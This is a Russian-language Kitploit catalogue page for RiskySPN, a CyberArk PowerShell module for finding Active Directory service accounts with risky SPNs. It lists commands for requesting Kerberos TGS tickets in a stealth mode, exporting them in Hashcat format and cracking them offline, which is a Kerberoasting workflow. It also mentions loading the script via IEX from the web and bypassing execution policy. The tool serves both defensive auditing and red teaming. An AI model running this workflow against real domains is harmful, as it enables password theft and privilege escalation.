Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
RiskySPN — Обнаруживать и злоупотреблять опасными SPN | Kitploit
Инструменты/GitHubGitHub/cyberark/riskyspn
Взлом паролейПовышение привилегийТестирование на ПроникновениеАутентификацияRed Teaming
GitHubcyberark/riskyspn

RiskySPN

Обнаруживать и злоупотреблять опасными SPN

Репозиторий
2657339 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

RiskySPNs

RiskySPNs — это набор сценариев PowerShell, предназначенных для обнаружения и атак на учётные записи, связанные с SPN (Service Principal Name). Этот модуль может помочь синим командам выявлять потенциально опасные SPN, а также красным командам повышать привилегии с помощью Kerberos и Active Directory.

Подробная информация: http://www.cyberark.com/blog/service-accounts-weakest-link-chain/

Использование

Установка модуля

root@kitploit:~
Import-Module .\RiskySPNs.psm1

Или просто загрузите сценарий (также можно использовать IEX из веб-источника)

root@kitploit:~
. .\Find-PotentiallyCrackableAccounts.ps1

Убедитесь, что Set-ExecutionPolicy имеет значение Unrestricted или Bypass

Получение информации о функции (очень подробно :))

root@kitploit:~
Get-Help Get-TGSCipher -Full

Все функции также имеют режим -Verbose

Поиск уязвимых SPN

Поиск уязвимых учётных записей

root@kitploit:~
Find-PotentiallyCrackableAccounts

Sensitive + RC4 = $$$

Создание подробного отчёта об уязвимых учётных записях (CISO <3)

root@kitploit:~
Export-PotentiallyCrackableAccounts

Получение билетов

Запрос Kerberos TGS для SPN

root@kitploit:~
Get-TGSCipher -SPN "MSSQLSvc/prodDB.company.com:1433"

Или

root@kitploit:~
Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher

Интересная часть :)

root@kitploit:~
Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File crack.txt
oclHashcat64.exe -m 13100 crack.txt -a 3
Скачать инструмент